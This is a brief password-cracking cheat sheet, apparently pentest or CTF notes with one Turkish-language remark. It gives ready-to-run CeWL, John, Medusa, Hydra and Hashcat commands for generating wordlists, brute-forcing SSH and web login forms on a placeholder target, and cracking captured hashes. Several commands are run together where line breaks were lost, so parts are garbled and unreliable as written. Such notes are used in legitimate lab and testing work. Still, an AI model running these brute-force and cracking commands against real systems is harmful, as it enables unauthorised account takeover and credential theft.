Cracking
Cewl
cewl http://<targetip>/ -m 6 -w cewl.txtwc -l cewl.txtjohn — wordlist=cewl.txt — rules — stdout > mutated.txtwc mutated.txtmedusa -h <targetip> -u admin -P mutated.txt -M http -n 80 -m DIR:/directory/to/login/panel -T 30
Hydra
hydra -l root -P /usr/share/wordlısts/rockyou.txt <targetip> ssh hydra -L userlist.txt -P /usr/share/wordlısts/rockyou.txt <targetip> -s 22 ssh -V
#Crak Web Passwords with Hydra
hydra -l admin -P /usr/share/seclists/Passwords/10k_most_common.txt <targetip> http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64
Medusa
medusa -h <targetip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/test -T 10
Hashcat
hashcat -h | grep -i lmhashcat -m 1600 hashes /usr/share/wordlists/rockyou.txt
veya
hashcat -h | grep -i lm
hashcat -m 3000 hashes --rules --wordlist=/usr/share/wordlists/rockyou.txt
Bazı rakamlar bulduğunuzda 32 bit olup olmadığını kontrol etmek için;
echo -n ....... | wc -c
John
john hashes.txt --rules --wordlist=/usr/share/wordlists/rockyou.txt